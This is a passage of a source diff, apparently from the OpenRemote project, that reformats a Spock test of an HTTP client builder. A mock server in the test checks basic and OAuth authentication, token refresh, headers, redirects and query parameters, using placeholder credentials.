+      def postCount = protocolInstance.resource1.postedAssets.size()
+      tryPost(authenticatedTestResource, testAsset)
+      assert postCount == protocolInstance.resource1.postedAssets.size()
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/protocol/http/WebTargetTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/http/WebTargetTest.groovy
@@ -39,508 +39,507 @@ import spock.lang.Specification
 
 class WebTargetTest extends Specification {
 
-    @Shared
-    def mockServer = new ClientRequestFilter() {
+  @Shared
+  def mockServer = new ClientRequestFilter() {
 
-        private boolean supportsRefresh
-        private int accessTokenCount
-        private int refreshTokenCount
-        private String accessToken = null
-        private String refreshToken = null
+    private boolean supportsRefresh
+    private int accessTokenCount
+    private int refreshTokenCount
+    private String accessToken = null
+    private String refreshToken = null
 
-        @Override
-        void filter(ClientRequestContext requestContext) throws IOException {
-            def requestUri = requestContext.uri
-            def requestPath = requestUri.scheme + "://" + requestUri.host + requestUri.path
+    @Override
+    void filter(ClientRequestContext requestContext) throws IOException {
+      def requestUri = requestContext.uri
+      def requestPath = requestUri.scheme + "://" + requestUri.host + requestUri.path
 
-            switch (requestPath)
-            {
-                case "https://basicserver/get":
-                    def authHeader = requestContext.getHeaderString(HttpHeaders.AUTHORIZATION)
-                    if (authHeader != null) {
-                        def usernameAndPassword = BasicAuthHelper.parseHeader(authHeader)
-                        if (usernameAndPassword != null
-                            && usernameAndPassword[0] == "testuser"
-                            && usernameAndPassword[1] == "password1") {
-                            requestContext.abortWith(Response.ok().build())
-                            return
-                        }
-                    }
-                    break
-                case "https://oauthserver/token":
-                case "https://oauthreuseserver/token":
-                    // OAuth token request extract the grant info
-                    def grant = ((Form)requestContext.getEntity()).asMap()
-                    if (grant.getFirst(OAuthGrant.VALUE_KEY_GRANT_TYPE) == "password"
-                        && grant.getFirst(OAuthGrant.VALUE_KEY_CLIENT_ID ) == "client1"
-                        && grant.getFirst(OAuthGrant.VALUE_KEY_CLIENT_SECRET ) == "secret1"
-                        && grant.getFirst(OAuthGrant.VALUE_KEY_SCOPE ) == "scope1 scope2"
-                        && grant.getFirst(OAuthPasswordGrant.VALUE_KEY_USERNAME) == "testuser"
-                        && grant.getFirst(OAuthPasswordGrant.VALUE_KEY_PASSWORD) == "password1") {
-                        accessToken = "accesstoken" + accessTokenCount++
-                        def response = new OAuthServerResponse()
-                        response.accessToken = accessToken
-                        response.expiresIn = requestPath == "https://oauthserver/token" ? 5 : 100
-                        response.tokenType = "Bearer"
+      switch (requestPath) {
+        case "https://basicserver/get":
+          def authHeader = requestContext.getHeaderString(HttpHeaders.AUTHORIZATION)
+          if (authHeader != null) {
+            def usernameAndPassword = BasicAuthHelper.parseHeader(authHeader)
+            if (usernameAndPassword != null
+                    && usernameAndPassword[0] == "testuser"
+                    && usernameAndPassword[1] == "password1") {
+              requestContext.abortWith(Response.ok().build())
+              return
+            }
+          }
+          break
+        case "https://oauthserver/token":
+        case "https://oauthreuseserver/token":
+        // OAuth token request extract the grant info
+          def grant = ((Form)requestContext.getEntity()).asMap()
+          if (grant.getFirst(OAuthGrant.VALUE_KEY_GRANT_TYPE) == "password"
+                  && grant.getFirst(OAuthGrant.VALUE_KEY_CLIENT_ID) == "client1"
+                  && grant.getFirst(OAuthGrant.VALUE_KEY_CLIENT_SECRET) == "secret1"
+                  && grant.getFirst(OAuthGrant.VALUE_KEY_SCOPE) == "scope1 scope2"
+                  && grant.getFirst(OAuthPasswordGrant.VALUE_KEY_USERNAME) == "testuser"
+                  && grant.getFirst(OAuthPasswordGrant.VALUE_KEY_PASSWORD) == "password1") {
+            accessToken = "accesstoken" + accessTokenCount++
+            def response = new OAuthServerResponse()
+            response.accessToken = accessToken
+            response.expiresIn = requestPath == "https://oauthserver/token" ? 5 : 100
+            response.tokenType = "Bearer"
 
-                        // Include refresh token if configured to support it
-                        if (supportsRefresh) {
-                            refreshToken = "refreshtoken" + accessTokenCount
-                            response.refreshToken = refreshToken
-                        }
-
-                        requestContext.abortWith(
-                            Response.ok(response, MediaType.APPLICATION_JSON_TYPE).build()
-                        )
-                        return
-                    } else if (grant.getFirst(OAuthGrant.VALUE_KEY_GRANT_TYPE) == "client_credentials"
-                        && grant.getFirst(OAuthGrant.VALUE_KEY_CLIENT_ID ) == "client1"
-                        && grant.getFirst(OAuthGrant.VALUE_KEY_CLIENT_SECRET ) == "secret1"
-                        && grant.getFirst(OAuthGrant.VALUE_KEY_SCOPE ) == "scope1 scope2") {
-                        accessToken = "accesstoken" + accessTokenCount++
-                        def response = new OAuthServerResponse()
-                        response.accessToken = accessToken
-                        response.expiresIn = requestPath == "https://oauthserver/token" ? 1 : 100
-                        response.tokenType = "Bearer"
-
-                        requestContext.abortWith(
-                            Response.ok(response, MediaType.APPLICATION_JSON_TYPE).build()
-                        )
-                        return
-                    } else if (supportsRefresh && grant.getFirst(OAuthGrant.VALUE_KEY_GRANT_TYPE) == "refresh_token"
-                        && grant.getFirst(OAuthGrant.VALUE_KEY_CLIENT_ID ) == "client1"
-                        && grant.getFirst(OAuthGrant.VALUE_KEY_CLIENT_SECRET ) == "secret1"
-                        && grant.getFirst(OAuthGrant.VALUE_KEY_SCOPE ) == "scope1 scope2"
-                        && grant.getFirst(OAuthRefreshTokenGrant.REFRESH_TOKEN_GRANT_TYPE) == refreshToken) {
-                        refreshTokenCount++
-                        accessToken = "accesstoken" + accessTokenCount++
-                        refreshToken = "refreshtoken" + accessTokenCount
-                        def response = new OAuthServerResponse()
-                        response.accessToken = accessToken
-                        response.refreshToken = refreshToken
-                        response.expiresIn = requestPath == "https://oauthserver/token" ? 1 : 100
-                        response.tokenType = "Bearer"
-
-                        requestContext.abortWith(
-                            Response.ok(response, MediaType.APPLICATION_JSON_TYPE).build()
-                        )
-                        return
-                    }
-                    break
-                case "https://oauthserver/get":
-                    // Check access token is what we sent
-                    def authHeader = requestContext.getHeaderString(HttpHeaders.AUTHORIZATION)
-                    def accessToken = authHeader.substring(7)
-                    if (accessToken != null && this.accessToken != null && accessToken == this.accessToken) {
-                        requestContext.abortWith(Response.ok().build())
-                        return
-                    }
-                    break
-                case "https://forbiddenserver":
-                    // Use access token counter to track requests
-                    accessTokenCount++
-                    requestContext.abortWith(
-                        Response.status(Response.Status.FORBIDDEN).build()
-                    )
-                    return
-                case "https://headerserver":
-                    if (requestContext.getHeaderString("MyHeader") == "MyHeaderValue"
-                        && requestContext.getHeaderString("MyMultiHeader") == "MyMultiHeaderValue1,MyMultiHeaderValue2") {
-                        requestContext.abortWith(Response.ok().build())
-                        return
-                    }
-                    break
-                case "https://headerserver/get":
-                    if (requestContext.getHeaderString("MyHeader") == "MyHeaderValue"
-                        && requestContext.getHeaderString("MyHeaderNew") == "MyHeaderNewValue"
-                        && requestContext.getHeaderString("MyMultiHeader") == "MyMultiHeaderValue1,MyMultiHeaderValue2,MyMultiHeaderValue3") {
-                        requestContext.abortWith(Response.ok().build())
-                        return
-                    }
-                    break
-                case "https://redirectserver":
-                    requestContext.abortWith(Response.temporaryRedirect(new URI("https://redirectedserver")).build())
-                    return
-                case "https://redirectedserver":
-                    requestContext.abortWith(Response.ok().build())
-                    return
-                case "https://paramserver":
-                    UriInfo uriInfo = new ResteasyUriInfo(requestContext.uri)
-                    def queryParams = uriInfo.getQueryParameters(true)
-                    if (queryParams.get("param1").size() == 1
-                        && queryParams.getFirst("param1") == "param1Value1"
-                        && queryParams.get("param2").size() == 2
-                        && queryParams.get("param2").get(0) == "param2Value1"
-                        &&queryParams.get("param2").get(1) == "param2Value2") {
-
-                        requestContext.abortWith(Response.ok().build())
-                        return
-                    }
-                    break
-                case "https://paramserver/get":
-                    UriInfo uriInfo = new ResteasyUriInfo(requestUri)
-                    def queryParams = uriInfo.getQueryParameters(true)
-                    if (queryParams.get("param1").size() == 2
-                        && queryParams.get("param1").contains("param1Value2")
-                        && queryParams.get("param1").contains("param1Value1")
-                        && queryParams.get("param2").size() == 2
-                        && queryParams.get("param2").contains("param2Value1")
-                        && queryParams.get("param2").contains("param2Value2")
-                        && queryParams.get("param3").size() == 1
-                        && queryParams.get("param3").contains("param3Value1")) {
-
-                        requestContext.abortWith(Response.ok().build())
-                        return
-                    }
-                    break
-                case "https://dynamicparamserver":
-                    UriInfo uriInfo = new ResteasyUriInfo(requestContext.uri)
-                    def queryParams = uriInfo.getQueryParameters(true)
-                    if (queryParams.get("param1").size() == 1
-                        && queryParams.getFirst("param1") == "dynamicValue1"
-                        && queryParams.get("param2").size() == 2
-                        && queryParams.get("param2").contains("param2Value1")
-                        &&queryParams.get("param2").contains("param2Value2")) {
-
-                        requestContext.abortWith(Response.ok().build())
-                        return
-                    }
+            // Include refresh token if configured to support it
+            if (supportsRefresh) {
+              refreshToken = "refreshtoken" + accessTokenCount
+              response.refreshToken = refreshToken
             }
 
-            requestContext.abortWith(Response.serverError().build())
-        }
+            requestContext.abortWith(
+                    Response.ok(response, MediaType.APPLICATION_JSON_TYPE).build()
+                    )
+            return
+          } else if (grant.getFirst(OAuthGrant.VALUE_KEY_GRANT_TYPE) == "client_credentials"
+                  && grant.getFirst(OAuthGrant.VALUE_KEY_CLIENT_ID) == "client1"
+                  && grant.getFirst(OAuthGrant.VALUE_KEY_CLIENT_SECRET) == "secret1"
+                  && grant.getFirst(OAuthGrant.VALUE_KEY_SCOPE) == "scope1 scope2") {
+            accessToken = "accesstoken" + accessTokenCount++
+            def response = new OAuthServerResponse()
+            response.accessToken = accessToken
+            response.expiresIn = requestPath == "https://oauthserver/token" ? 1 : 100
+            response.tokenType = "Bearer"
+
+            requestContext.abortWith(
+                    Response.ok(response, MediaType.APPLICATION_JSON_TYPE).build()
+                    )
+            return
+          } else if (supportsRefresh && grant.getFirst(OAuthGrant.VALUE_KEY_GRANT_TYPE) == "refresh_token"
+                  && grant.getFirst(OAuthGrant.VALUE_KEY_CLIENT_ID) == "client1"
+                  && grant.getFirst(OAuthGrant.VALUE_KEY_CLIENT_SECRET) == "secret1"
+                  && grant.getFirst(OAuthGrant.VALUE_KEY_SCOPE) == "scope1 scope2"
+                  && grant.getFirst(OAuthRefreshTokenGrant.REFRESH_TOKEN_GRANT_TYPE) == refreshToken) {
+            refreshTokenCount++
+            accessToken = "accesstoken" + accessTokenCount++
+            refreshToken = "refreshtoken" + accessTokenCount
+            def response = new OAuthServerResponse()
+            response.accessToken = accessToken
+            response.refreshToken = refreshToken
+            response.expiresIn = requestPath == "https://oauthserver/token" ? 1 : 100
+            response.tokenType = "Bearer"
+
+            requestContext.abortWith(
+                    Response.ok(response, MediaType.APPLICATION_JSON_TYPE).build()
+                    )
+            return
+          }
+          break
+        case "https://oauthserver/get":
+        // Check access token is what we sent
+          def authHeader = requestContext.getHeaderString(HttpHeaders.AUTHORIZATION)
+          def accessToken = authHeader.substring(7)
+          if (accessToken != null && this.accessToken != null && accessToken == this.accessToken) {
+            requestContext.abortWith(Response.ok().build())
+            return
+          }
+          break
+        case "https://forbiddenserver":
+        // Use access token counter to track requests
+          accessTokenCount++
+          requestContext.abortWith(
+                  Response.status(Response.Status.FORBIDDEN).build()
+                  )
+          return
+        case "https://headerserver":
+          if (requestContext.getHeaderString("MyHeader") == "MyHeaderValue"
+          && requestContext.getHeaderString("MyMultiHeader") == "MyMultiHeaderValue1,MyMultiHeaderValue2") {
+            requestContext.abortWith(Response.ok().build())
+            return
+          }
+          break
+        case "https://headerserver/get":
+          if (requestContext.getHeaderString("MyHeader") == "MyHeaderValue"
+          && requestContext.getHeaderString("MyHeaderNew") == "MyHeaderNewValue"
+          && requestContext.getHeaderString("MyMultiHeader") == "MyMultiHeaderValue1,MyMultiHeaderValue2,MyMultiHeaderValue3") {
+            requestContext.abortWith(Response.ok().build())
+            return
+          }
+          break
+        case "https://redirectserver":
+          requestContext.abortWith(Response.temporaryRedirect(new URI("https://redirectedserver")).build())
+          return
+        case "https://redirectedserver":
+          requestContext.abortWith(Response.ok().build())
+          return
+        case "https://paramserver":
+          UriInfo uriInfo = new ResteasyUriInfo(requestContext.uri)
+          def queryParams = uriInfo.getQueryParameters(true)
+          if (queryParams.get("param1").size() == 1
+                  && queryParams.getFirst("param1") == "param1Value1"
+                  && queryParams.get("param2").size() == 2
+                  && queryParams.get("param2").get(0) == "param2Value1"
+                  &&queryParams.get("param2").get(1) == "param2Value2") {
+
+            requestContext.abortWith(Response.ok().build())
+            return
+          }
+          break
+        case "https://paramserver/get":
+          UriInfo uriInfo = new ResteasyUriInfo(requestUri)
+          def queryParams = uriInfo.getQueryParameters(true)
+          if (queryParams.get("param1").size() == 2
+                  && queryParams.get("param1").contains("param1Value2")
+                  && queryParams.get("param1").contains("param1Value1")
+                  && queryParams.get("param2").size() == 2
+                  && queryParams.get("param2").contains("param2Value1")
+                  && queryParams.get("param2").contains("param2Value2")
+                  && queryParams.get("param3").size() == 1
+                  && queryParams.get("param3").contains("param3Value1")) {
+
+            requestContext.abortWith(Response.ok().build())
+            return
+          }
+          break
+        case "https://dynamicparamserver":
+          UriInfo uriInfo = new ResteasyUriInfo(requestContext.uri)
+          def queryParams = uriInfo.getQueryParameters(true)
+          if (queryParams.get("param1").size() == 1
+                  && queryParams.getFirst("param1") == "dynamicValue1"
+                  && queryParams.get("param2").size() == 2
+                  && queryParams.get("param2").contains("param2Value1")
+                  &&queryParams.get("param2").contains("param2Value2")) {
+
+            requestContext.abortWith(Response.ok().build())
+            return
+          }
+      }
+
+      requestContext.abortWith(Response.serverError().build())
     }
+  }
 
-    @AutoCleanup
-    @Shared
-    ResteasyClient client
+  @AutoCleanup
+  @Shared
+  ResteasyClient client
 
-    def setupSpec() {
-        // Initialise the web target builder and load in the mock 'server'
-        client = WebTargetBuilder.createClient(null)
-        client.register(mockServer, Integer.MAX_VALUE)
-    }
+  def setupSpec() {
+    // Initialise the web target builder and load in the mock 'server'
+    client = WebTargetBuilder.createClient(null)
+    client.register(mockServer, Integer.MAX_VALUE)
+  }
 
-    def cleanup() {
-        mockServer.supportsRefresh = false
-        mockServer.accessToken = null
-        mockServer.refreshToken = null
-        mockServer.accessTokenCount = 0
-        mockServer.refreshTokenCount = 0
-    }
+  def cleanup() {
+    mockServer.supportsRefresh = false
+    mockServer.accessToken = null
+    mockServer.refreshToken = null
+    mockServer.accessTokenCount = 0
+    mockServer.refreshTokenCount = 0
+  }
 
-    def "OAuth grant serialisation and deserialisation"() {
+  def "OAuth grant serialisation and deserialisation"() {
 
-        given: "a grant object"
-        OAuthPasswordGrant grant = new OAuthPasswordGrant("https://mockapi/token",
+    given: "a grant object"
+    OAuthPasswordGrant grant = new OAuthPasswordGrant("https://mockapi/token",
             "TestClient",
             "TestSecret",
             "scope1 scope2",
             "testuser",
             "password")
 
-        when: "it is serialised"
-        String grantStr = ValueUtil.asJSON(grant).orElse(null)
+    when: "it is serialised"
+    String grantStr = ValueUtil.asJSON(grant).orElse(null)
 
-        and: "deserialised again"
-        OAuthGrant grant2 = ValueUtil.JSON.readValue(grantStr, OAuthGrant.class)
+    and: "deserialised again"
+    OAuthGrant grant2 = ValueUtil.JSON.readValue(grantStr, OAuthGrant.class)
 
-        then: "the two grant objects should be the same"
-        assert grant2.tokenEndpointUri == grant.tokenEndpointUri
-        assert grant2.grantType == grant.grantType
-        assert grant2.clientId == grant.clientId
-        assert grant2.clientSecret == grant.clientSecret
-        assert grant2.scope == grant.scope
-        assert ((OAuthPasswordGrant)grant2).username == grant.username
-        assert ((OAuthPasswordGrant)grant2).password == grant.password
+    then: "the two grant objects should be the same"
+    assert grant2.tokenEndpointUri == grant.tokenEndpointUri
+    assert grant2.grantType == grant.grantType
+    assert grant2.clientId == grant.clientId
+    assert grant2.clientSecret == grant.clientSecret
+    assert grant2.scope == grant.scope
+    assert ((OAuthPasswordGrant)grant2).username == grant.username
+    assert ((OAuthPasswordGrant)grant2).password == grant.password
 
-        when: "serialised"
-        Map<String, Object> map = new HashMap<>();
-        String v = "{\"test\": 123}"
-        map.put("value", v)
-        String mapStr = ValueUtil.JSON.writeValueAsString(map)
+    when: "serialised"
+    Map<String, Object> map = new HashMap<>()
+    String v = "{\"test\": 123}"
+    map.put("value", v)
+    String mapStr = ValueUtil.JSON.writeValueAsString(map)
 
-        and: "deserialised"
-        def newMap = ValueUtil.JSON.readValue(mapStr, Map.class)
+    and: "deserialised"
+    def newMap = ValueUtil.JSON.readValue(mapStr, Map.class)
 
-        then: "should work"
-        assert newMap != null
-    }
+    then: "should work"
+    assert newMap != null
+  }
 
-    def "Check Basic authentication"() {
+  def "Check Basic authentication"() {
 
-        given: "a web target for a server requiring basic authentication"
-        def target = new WebTargetBuilder(client, new URIBuilder("https://basicserver").build())
+    given: "a web target for a server requiring basic authentication"
+    def target = new WebTargetBuilder(client, new URIBuilder("https://basicserver").build())
             .setBasicAuthentication("testuser", "password1")
             .build()
 
-        when: "a request is made to an endpoint on that server"
-        def response = target.path("get").request().get()
+    when: "a request is made to an endpoint on that server"
+    def response = target.path("get").request().get()
 
-        then: "the response should be 200 OK"
-        assert response.getStatus() == 200
-    }
+    then: "the response should be 200 OK"
+    assert response.getStatus() == 200
+  }
 
-    def "Check OAuth resource owner credentials (password) grant authentication"() {
+  def "Check OAuth resource owner credentials (password) grant authentication"() {
 
-        given: "a web target for a server requiring OAuth 'password' grant authentication"
-        def target = new WebTargetBuilder(client, new URIBuilder("https://oauthserver").build())
+    given: "a web target for a server requiring OAuth 'password' grant authentication"
+    def target = new WebTargetBuilder(client, new URIBuilder("https://oauthserver").build())
             .setOAuthAuthentication(
-                new OAuthPasswordGrant(
+            new OAuthPasswordGrant(
                     "https://oauthserver/token",
                     "client1",
                     "secret1",
                     "scope1 scope2",
                     "testuser",
                     "password1"
-                )
+                    )
             )
             .build()
 
-        when: "a request is made to an endpoint on that server"
-        def response = target.path("get").request().get()
+    when: "a request is made to an endpoint on that server"
+    def response = target.path("get").request().get()
 
-        then: "the response should be 200 OK"
-        assert response.getStatus() == 200
+    then: "the response should be 200 OK"
+    assert response.getStatus() == 200
 
-        when: "another request is made to an endpoint on the server that will require renewing the access token"
-        response = target.path("get").request().get()
+    when: "another request is made to an endpoint on the server that will require renewing the access token"
+    response = target.path("get").request().get()
 
-        then: "the response should be 200 OK"
-        assert response.getStatus() == 200
+    then: "the response should be 200 OK"
+    assert response.getStatus() == 200
 
-        and: "the server should have generated 2 access tokens but no refresh tokens"
-        assert mockServer.accessTokenCount == 2
-        assert mockServer.refreshTokenCount == 0
+    and: "the server should have generated 2 access tokens but no refresh tokens"
+    assert mockServer.accessTokenCount == 2
+    assert mockServer.refreshTokenCount == 0
 
-        when: "the server supports token refresh"
-        mockServer.supportsRefresh = true
-        mockServer.accessToken = null
-        mockServer.refreshToken = null
-        mockServer.accessTokenCount = 0
+    when: "the server supports token refresh"
+    mockServer.supportsRefresh = true
+    mockServer.accessToken = null
+    mockServer.refreshToken = null
+    mockServer.accessTokenCount = 0
 
-        and: "a request is made to an endpoint on that server"
-        response = target.path("get").request().get()
+    and: "a request is made to an endpoint on that server"
+    response = target.path("get").request().get()
 
-        then: "the response should be 200 OK"
-        assert response.getStatus() == 200
+    then: "the response should be 200 OK"
+    assert response.getStatus() == 200
 
-        when: "another request is made to an endpoint on the server that will require renewing the access token"
-        response = target.path("get").request().get()
+    when: "another request is made to an endpoint on the server that will require renewing the access token"
+    response = target.path("get").request().get()
 
-        then: "the response should be 200 OK"
-        assert response.getStatus() == 200
+    then: "the response should be 200 OK"
+    assert response.getStatus() == 200
 
-        and: "the server should have generated 2 access tokens and 1 refresh token"
-        assert mockServer.accessTokenCount == 2
-        assert mockServer.refreshTokenCount == 1
-    }
+    and: "the server should have generated 2 access tokens and 1 refresh token"
+    assert mockServer.accessTokenCount == 2
+    assert mockServer.refreshTokenCount == 1
+  }
 
-    def "Check OAuth client credentials grant authentication"() {
+  def "Check OAuth client credentials grant authentication"() {
 
-        given: "a web target for a server requiring OAuth 'client_credentials' grant authentication"
-        def target = new WebTargetBuilder(client, new URIBuilder("https://oauthserver").build())
+    given: "a web target for a server requiring OAuth 'client_credentials' grant authentication"
+    def target = new WebTargetBuilder(client, new URIBuilder("https://oauthserver").build())
             .setOAuthAuthentication(
             new OAuthClientCredentialsGrant(
-                "https://oauthserver/token",
-                "client1",
-                "secret1",
-                "scope1 scope2"
+                    "https://oauthserver/token",
+                    "client1",
+                    "secret1",
+                    "scope1 scope2"
+                    )
             )
-        )
             .build()
 
-        when: "a request is made to an endpoint on that server"
-        def response = target.path("get").request().get()
+    when: "a request is made to an endpoint on that server"
+    def response = target.path("get").request().get()
 
-        then: "the response should be 200 OK"
-        assert response.getStatus() == 200
+    then: "the response should be 200 OK"
+    assert response.getStatus() == 200
 
-        when: "another request is made to an endpoint on the server that will require renewing the access token"
-        response = target.path("get").request().get()
+    when: "another request is made to an endpoint on the server that will require renewing the access token"
+    response = target.path("get").request().get()
 
-        then: "the response should be 200 OK"
-        assert response.getStatus() == 200
+    then: "the response should be 200 OK"
+    assert response.getStatus() == 200
 
-        and: "the server should have generated 2 access tokens but no refresh tokens"
-        assert mockServer.accessTokenCount == 2
-        assert mockServer.refreshTokenCount == 0
-    }
+    and: "the server should have generated 2 access tokens but no refresh tokens"
+    assert mockServer.accessTokenCount == 2
+    assert mockServer.refreshTokenCount == 0
+  }
 
-    def "Check OAuth token reuse functionality"() {
+  def "Check OAuth token reuse functionality"() {
 
-        given: "a web target for a server requiring OAuth 'client_credentials' grant authentication"
-        def target = new WebTargetBuilder(client, new URIBuilder("https://oauthserver/get").build())
+    given: "a web target for a server requiring OAuth 'client_credentials' grant authentication"
+    def target = new WebTargetBuilder(client, new URIBuilder("https://oauthserver/get").build())
             .setOAuthAuthentication(
-                new OAuthClientCredentialsGrant(
+            new OAuthClientCredentialsGrant(
                     "https://oauthreuseserver/token",
                     "client1",
                     "secret1",
                     "scope1 scope2"
-                ))
+                    ))
             .build()
 
-        when: "a request is made to an endpoint on that server"
-        def response = target.request().get()
+    when: "a request is made to an endpoint on that server"
+    def response = target.request().get()
 
-        then: "the response should be 200 OK"
-        assert response.getStatus() == 200
+    then: "the response should be 200 OK"
+    assert response.getStatus() == 200
 
-        when: "another request is made to an endpoint on the server"
-        response = target.request().get()
+    when: "another request is made to an endpoint on the server"
+    response = target.request().get()
 
-        then: "the response should be 200 OK"
-        assert response.getStatus() == 200
+    then: "the response should be 200 OK"
+    assert response.getStatus() == 200
 
-        and: "the server should have generated 1 access tokens and no refresh tokens"
-        assert mockServer.accessTokenCount == 1
-        assert mockServer.refreshTokenCount == 0
-    }
+    and: "the server should have generated 1 access tokens and no refresh tokens"
+    assert mockServer.accessTokenCount == 1
+    assert mockServer.refreshTokenCount == 0
+  }
 
-    def "Check permanent failure functionality"() {
+  def "Check permanent failure functionality"() {
 
-        given: "a web target for a server set to permanently fail on 403 errors"
-        def target = new WebTargetBuilder(client, new URIBuilder("https://forbiddenserver").build())
+    given: "a web target for a server set to permanently fail on 403 errors"
+    def target = new WebTargetBuilder(client, new URIBuilder("https://forbiddenserver").build())
             .addPermanentFailureResponse(Response.Status.FORBIDDEN)
             .build()
 
-        when: "a request is made that generates a 403 response"
-        def response = target.request().get()
+    when: "a request is made that generates a 403 response"
+    def response = target.request().get()
 
-        then: "the server should have been hit and response should be 403 forbidden"
-        assert mockServer.accessTokenCount == 1
-        assert response.getStatus() == 403
+    then: "the server should have been hit and response should be 403 forbidden"
+    assert mockServer.accessTokenCount == 1
+    assert response.getStatus() == 403
 
-        when: "another request is made to the server"
-        response = target.request().get()
+    when: "another request is made to the server"
+    response = target.request().get()
 
-        then: "the server should not have been hit and the response should be 405 method not allowed"
-        assert mockServer.accessTokenCount == 1
-        assert response.getStatus() == 405
-    }
+    then: "the server should not have been hit and the response should be 405 method not allowed"
+    assert mockServer.accessTokenCount == 1
+    assert response.getStatus() == 405
+  }
 
-    def "Check header handling"() {
+  def "Check header handling"() {
 
-        given: "custom headers to inject"
-        def headers = new MultivaluedHashMap<String, String>(2)
-        headers.add("MyHeader", "MyHeaderValue")
-        headers.put("MyMultiHeader", ["MyMultiHeaderValue1","MyMultiHeaderValue2"])
+    given: "custom headers to inject"
+    def headers = new MultivaluedHashMap<String, String>(2)
+    headers.add("MyHeader", "MyHeaderValue")
+    headers.put("MyMultiHeader", ["MyMultiHeaderValue1", "MyMultiHeaderValue2"])
 
-        and: "a web target for a server"
-        def target = new WebTargetBuilder(client, new URIBuilder("https://headerserver").build())
+    and: "a web target for a server"
+    def target = new WebTargetBuilder(client, new URIBuilder("https://headerserver").build())
             .build()
 
-        when: "a request is made to the server"
-        def request = target.request()
-        request = WebTargetBuilder.addHeaders(request, headers)
-        def response = request.get()
+    when: "a request is made to the server"
+    def request = target.request()
+    request = WebTargetBuilder.addHeaders(request, headers)
+    def response = request.get()
 
-        then: "the response should be a 200 OK indicating the custom headers reached the server"
-        assert response.getStatus() == 200
+    then: "the response should be a 200 OK indicating the custom headers reached the server"
+    assert response.getStatus() == 200
 
-        when: "a request is made to the server with additional headers"
-        headers.add("MyHeaderNew", "MyHeaderNewValue")
-        headers.add("MyMultiHeader", "MyMultiHeaderValue3")
-        response = WebTargetBuilder.addHeaders(target.path("get").request(), headers).get()
+    when: "a request is made to the server with additional headers"
+    headers.add("MyHeaderNew", "MyHeaderNewValue")
+    headers.add("MyMultiHeader", "MyMultiHeaderValue3")
+    response = WebTargetBuilder.addHeaders(target.path("get").request(), headers).get()
 
-        then: "the response should be a 200 OK indicating the custom headers reached the server"
-        assert response.getStatus() == 200
-    }
+    then: "the response should be a 200 OK indicating the custom headers reached the server"
+    assert response.getStatus() == 200
+  }
 
-    def "Check redirect handling"() {
+  def "Check redirect handling"() {
 
-        given: "a web target for a server"
-        def target = new WebTargetBuilder(client, new URIBuilder("https://redirectserver").build())
+    given: "a web target for a server"
+    def target = new WebTargetBuilder(client, new URIBuilder("https://redirectserver").build())
             .followRedirects(true)
             .build()
 
-        when: "a request is made to the server that returns a redirect response"
-        def response = target.request().get()
+    when: "a request is made to the server that returns a redirect response"
+    def response = target.request().get()
 
-        then: "the response should be a 200 OK and it should have come from the redirected server"
-        assert response.getStatus() == 200
-        assert response.getLocation().toString() == "https://redirectedserver"
-    }
+    then: "the response should be a 200 OK and it should have come from the redirected server"
+    assert response.getStatus() == 200
+    assert response.getLocation().toString() == "https://redirectedserver"
+  }
 
-    def "Check query parameter handling"() {
+  def "Check query parameter handling"() {
 
-        given: "query parameters to inject"
-        def params = new MultivaluedHashMap<String, String>(2)
-        params.add("param1", "param1Value1")
-        params.put("param2", ["param2Value1","param2Value2"])
+    given: "query parameters to inject"
+    def params = new MultivaluedHashMap<String, String>(2)
+    params.add("param1", "param1Value1")
+    params.put("param2", ["param2Value1", "param2Value2"])
 
-        and: "a web target for a server"
-        def target = new WebTargetBuilder(client, new URIBuilder("https://paramserver").build())
+    and: "a web target for a server"
+    def target = new WebTargetBuilder(client, new URIBuilder("https://paramserver").build())
             .build()
 
-        and: "some query parameters"
-        target = WebTargetBuilder.addQueryParams(target, params)
+    and: "some query parameters"
+    target = WebTargetBuilder.addQueryParams(target, params)
 
-        when: "a request is made to the server"
-        def response = target.request().get()
+    when: "a request is made to the server"
+    def response = target.request().get()
 
-        then: "the response should be a 200 OK indicating the query parameters reached the server"
-        assert response.getStatus() == 200
+    then: "the response should be a 200 OK indicating the query parameters reached the server"
+    assert response.getStatus() == 200
 
-        when: "a request is made to the server with a different path and additional query parameters"
-        params = new MultivaluedHashMap<String, String>()
-        params.add("param1", "param1Value2")
-        params.add("param3", "param3Value1")
-        def newTarget = target.path("get")
-        newTarget = WebTargetBuilder.addQueryParams(newTarget, params)
-        response = newTarget
+    when: "a request is made to the server with a different path and additional query parameters"
+    params = new MultivaluedHashMap<String, String>()
+    params.add("param1", "param1Value2")
+    params.add("param3", "param3Value1")
+    def newTarget = target.path("get")
+    newTarget = WebTargetBuilder.addQueryParams(newTarget, params)
+    response = newTarget
             .request()
             .get()
 
-        then: "the response should be a 200 OK indicating the custom headers reached the server"
-        assert response.getStatus() == 200
-    }
+    then: "the response should be a 200 OK indicating the custom headers reached the server"
+    assert response.getStatus() == 200
+  }
 
-    def "Check dynamic query parameter handling"() {
+  def "Check dynamic query parameter handling"() {
 
-        given: "query parameters to inject with dynamic placeholders"
-        def params = new MultivaluedHashMap<String, String>(2)
-        params.add("param1", "%VALUE%")
-        params.put("param2", ["param2Value1","param2Value2"])
+    given: "query parameters to inject with dynamic placeholders"
+    def params = new MultivaluedHashMap<String, String>(2)
+    params.add("param1", "%VALUE%")
+    params.put("param2", ["param2Value1", "param2Value2"])
 
-        and: "a web target for a server"
-        def target = new WebTargetBuilder(client, new URIBuilder("https://dynamicparamserver").build())
+    and: "a web target for a server"
+    def target = new WebTargetBuilder(client, new URIBuilder("https://dynamicparamserver").build())
             .build()
 
-        and: "dynamic query params"
-        target = WebTargetBuilder.addQueryParams(target, params)
+    and: "dynamic query params"
+    target = WebTargetBuilder.addQueryParams(target, params)
 
-        when: "a request is made to the server with a dynamic value"
-        def response = target.request()
+    when: "a request is made to the server with a dynamic value"
+    def response = target.request()
             .property(DynamicValueInjectorFilter.DYNAMIC_VALUE_PROPERTY, "dynamicValue1")
             .get()
 
-        then: "the response should be a 200 OK indicating the query parameters reached the server"
-        assert response.getStatus() == 200
-    }
+    then: "the response should be a 200 OK indicating the query parameters reached the server"
+    assert response.getStatus() == 200
+  }
 
 
-//    def "Check real OAuth resource owner credentials (password) grant authentication"() {
-//
-//        given: "A web target for a server requiring OAuth 'password' grant authentication"
-//        def target = new WebTargetBuilder("client, new URIBuilder(https://www.telecontrolnet.nl/api/v1").build())
-//            .setOAuthAuthentication(
-//            new OAuthPasswordGrant(
